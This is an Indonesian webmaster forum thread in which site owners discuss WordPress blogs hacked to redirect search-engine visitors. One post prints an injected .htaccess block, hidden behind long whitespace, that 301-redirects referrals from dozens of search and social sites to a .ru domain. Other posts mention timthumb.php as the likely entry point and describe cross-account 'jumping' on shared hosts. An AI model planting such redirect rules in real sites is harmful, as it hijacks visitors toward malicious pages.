NgeHacknya Kejam Banget | Visitor sampe down 90% hati-hati agan juga bisa kena

ipanripai · Feb 19, 2012

apakah paid to promote setelah di lepas scriptnya baklan ninggalin jejak lain di host kita??

andinimulya · Feb 19, 2012

jemblunk said: ↑

ane juga kena satu host semua diredirect dan semua dari htaccess
coba perhatiin script di htaccess ada space kosong nga diatas sebelum

Code:

                                                                                                                                                                                                                                                
                                                                                                                        <IfModule mod_rewrite.c>                                                                                                                        
                                                                                                                        RewriteEngine On                                                                                                                        
                                                                                                                        RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*)                                                                                                                        
                                                                                                                        RewriteRule ^(.*)$ http://daliachuuaroyalys.ru/industry/index.php [R=301,L]                                                                                                                        
                                                                                                                        RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|ireland-information|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline)\.(.*)                                                                                                                        
                                                                                                                        RewriteRule ^(.*)$ http://daliachuuaroyalys.ru/industry/index.php [R=301,L]                                                                                                                        
                                                                                                                        </IfModule>                                                                                                                        
                                                                                                                                                                                                                                                






# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>

ane sertakan nie script yang ngeredirect site ane seolah2 nga ada apa2 kan coba scroll ampe ujung
ane aja awal nya nga nyangka ternyata :omg:

kalo ada coba ente scroll ampe nemu tu script redirect nya :senyum:

kalo bener hasilnya sama saat ini cuman 1 cara nya
install di host baru ambil DB nya doank
baru dipindah tapi jangan sampe file Wp nya ente ikutkan cuman DB nya doank yang bisa save kata support host ane :swt2:

Click to expand...

ane juga kena yg beginian gan,,,,, udah ada yg bahas masalah ginian ga ya

killzone3 · Feb 19, 2012

set dah,serem amat

8am6u · Feb 19, 2012

wah... jgn sampe deh ane kena... bisa runyam kalo kaga ngerti script ... .. disimpen dulu ni gan inponya ..thx gan

anjas · Feb 19, 2012

Beuh...ancaman ne!!!. Semoga saja WP ane gak kena. Amin

coba nonaktifkan smua plugin yang dipakai, trus clear cache browser, bila masih sama,
Coba download all file WP nya, trus di search di dreamweaver, bila masih sama juga,
hubungi CS layanan hostingnya.

brother · Feb 19, 2012

Iya kemungkinan besar melalui
thimthumb.php?scr=
soalnya online shop/web/blog yg paling gampang kena hack adalah blog yg menggunakan bentuk url yg berakhiran namafile.php?keterangan="*" contoh lain /buy.php?id=
& kalau yg kena root lebih baik pindah daripada capek

andinimulya · Feb 19, 2012

brother said: ↑

Iya kemungkinan besar melalui
thimthumb.php?scr=
soalnya online shop/web/blog yg paling gampang kena hack adalah blog yg menggunakan bentuk url yg berakhiran namafile.php?keterangan="*" contoh lain /buy.php?id=
& kalau yg kena root lebih baik pindah daripada capek
Click to expand...

trus klo pindah yg bagus apaan gan,,,, web yg kena pake hawkhost, dah pusing balik lg balik lg script itu

brother · Feb 19, 2012

andinimulya said: ↑

trus klo pindah yg bagus apaan gan,,,, web yg kena pake hawkhost, dah pusing balik lg balik lg script itu
Click to expand...

kan banyak yg aman, misalnya di GD/HG & lokal pun gak masalah asal adminnya handal

andinimulya · Feb 19, 2012

brother said: ↑

kan banyak yg aman, misalnya di GD/HG & lokal pun gak masalah asal adminnya handal
Click to expand...

nie juga lg ikutan yg hosting keroyokan

francessco · Feb 19, 2012

gan sekedar berbagi pengalaman gan, CMS wordpress terdapat bugs yg valid untuk backdorr gan....
dulu ane sering nembus WP orang sekedar Iseng, itupun WP Site luarr....
jadi hati" gan, skrg ane udah gk gtuan lagi, menuju jalan yg lurus

(-0_0-)/"\[^_^] · Feb 19, 2012

andinimulya said: ↑

trus klo pindah yg bagus apaan gan,,,, web yg kena pake hawkhost, dah pusing balik lg balik lg script itu
Click to expand...

sebenernya semua hosting itu bagus apa lagi itu sekelas hawkhost .. kecuali bl***ost yang direktorie ussernya /home2/usser/ , /home3/usser/ dst. (ane baru ajah melakuakan jumping di host itu dan lumayan dapat banyak usser name yang satu directori,, tapi ane cuma buat kasih warn ajah ke developer CMS yang vuln itu pun untuk tujuan knowledge saja , dan mencari $$$ jika sang developer merasa terbantu dengan hadirnya saya yang melakukan pentest jika tidak dapat ya syukur alhamdulilah kembali ke asal tujuan untuk pengetahuan dan membantu ) tapi tetep ga ada yang 100% secure walaupun udah pake ssl ,, ( tapi ane bukan Ha*ker loh ) jika sudah dapat sebuah web yang vuln maka sang ha*ker akan senantiasa untuk melakukan teknik jumping << ini sering terjadi jika sang ha*ker ingin melakukan mass deface , tapi beda jika sang ha*ker yang hanya ingin masuk dan mamfaatin untuk upload file yang besar bisa di katakan numpang naruh file, tapi kembali lagi dari sang ha*ker tersebut tujuan nya apa.. tapi bagaimana usser yang memakai jasa si webhost tersebut. ya kalau kita memang sering update cms dan plugin kita tapi belum tentu usser yang lain sama seperti kita yang suka update.

semutdanlaba2 · Feb 20, 2012

gawat juga tuh.

Kira2 yang salah CMS-nya? Hostingnya? ato yang salah Hacker-nya ya?

andinimulya · Feb 20, 2012

(-0_0-)/"\[^_^];1499395 said:

sebenernya semua hosting itu bagus apa lagi itu sekelas hawkhost .. kecuali bl***ost yang direktorie ussernya /home2/usser/ , /home3/usser/ dst. (ane baru ajah melakuakan jumping di host itu dan lumayan dapat banyak usser name yang satu directori,, tapi ane cuma buat kasih warn ajah ke developer CMS yang vuln itu pun untuk tujuan knowledge saja , dan mencari $$$ jika sang developer merasa terbantu dengan hadirnya saya yang melakukan pentest jika tidak dapat ya syukur alhamdulilah kembali ke asal tujuan untuk pengetahuan dan membantu ) tapi tetep ga ada yang 100% secure walaupun udah pake ssl ,, ( tapi ane bukan Ha*ker loh ) jika sudah dapat sebuah web yang vuln maka sang ha*ker akan senantiasa untuk melakukan teknik jumping << ini sering terjadi jika sang ha*ker ingin melakukan mass deface , tapi beda jika sang ha*ker yang hanya ingin masuk dan mamfaatin untuk upload file yang besar bisa di katakan numpang naruh file, tapi kembali lagi dari sang ha*ker tersebut tujuan nya apa.. tapi bagaimana usser yang memakai jasa si webhost tersebut. ya kalau kita memang sering update cms dan plugin kita tapi belum tentu usser yang lain sama seperti kita yang suka update.
Click to expand...

trus baiknya gmn tuh mastah klo udah terlanjur kena,,,,, mohon masukannya

brother · Feb 20, 2012

semutdanlaba2 said: ↑

gawat juga tuh.

Kira2 yang salah CMS-nya? Hostingnya? ato yang salah Hacker-nya ya?
Click to expand...

Gak ada yg salah

CMS : Sudah berusaha membuat script yg diusahakan semaksimal mungkin aman.
Hosting : Juga sama sudah berusaha memberikan yg terbaik dengan layanan2 yang ditawarkan. "Ada Uang Ada Barang & Kualitas"
Hacker : Ini sebagai tukang periksa keamanan, tanpa kehadiran hacker g ada yg tahu keamanan sebuah system di dunia Internet. klo cuman deface, kita2 seharusnya berterimakasih karena dengan itu kita mendapat rambu2 klo di blog kita ada hole/vuln. beda acara klo cracker yg biasanya mengincar online shop. mereka diam & tidak memberikan sinyal, tapi tiba2 DB OS tsb dah di ambil sm cracker, bahkan ada yg dibuatkan pintu belakang supaya cracker tersebut bisa keluar masuk dg bebas.

rakabitor · Feb 21, 2012

Bujug dah malah kena juga tempat hosting ane
Berkali-kali rubah htaccess sampai pasang plugin security buat wp tetap gak mempan
capek dah ....
apa udah jadi tukang uroot neh hostingannya ???? :bingung:

arief1610 · Feb 22, 2012

yang salah itu hacker, punya kemampuan kok dipake buat yg enggak2

LatifahM · Feb 22, 2012

Ane baru aja ngalamin hal ini. Inner page blog2 ane pasti redirect ke http://bannortim-qimulta.ru/industry/index.php asseeemmmm

Hosting di buaya, langsung aja ane manfaatin live supportnya. Awalnya si technical coba langsung action, tapi kayanya dia ga bisa, langsung dia buka tiket ke dept security-nya si buaya. Kurang lebih 3 jam udah dibersihin tuh ama securitynya.

Ane juga cek pake http://sitecheck.sucuri.net/scanner/ dan emang kedetect ada malware yang ditanem.

So coba manfaatin supportnya si penyedia hosting jadi kunci buat ane

Rintoo · Feb 27, 2012

Nyimakkkk :-b:-b:-b:-b

agusindra43 · Feb 27, 2012

ow kayaknya itu sih bawaan iklan bro..ato templatenya gratisan soalnya biasaya di sengaja tu di kasi sekrip gituan

andinimulya · Feb 27, 2012

pindah hosting ikut kereta2 an kan baru marak dimari

Log in or Sign up

NgeHacknya Kejam Banget | Visitor sampe down 90% hati-hati agan juga bisa kena

ipanripai Super Hero

andinimulya Hero

killzone3 Hero

8am6u Ads.id Pro

anjas Ads.id Starter

brother >Walyatalattaf<

andinimulya Hero

brother >Walyatalattaf<

andinimulya Hero

francessco Super Hero

(-0_0-)/"\[^_^] Cuti Sementara

semutdanlaba2 Hero

andinimulya Hero

brother >Walyatalattaf<

rakabitor Hero

arief1610 Ads.id Starter

LatifahM Banned

Rintoo Ads.id Fan

agusindra43 Newbie

andinimulya Hero

Share This Page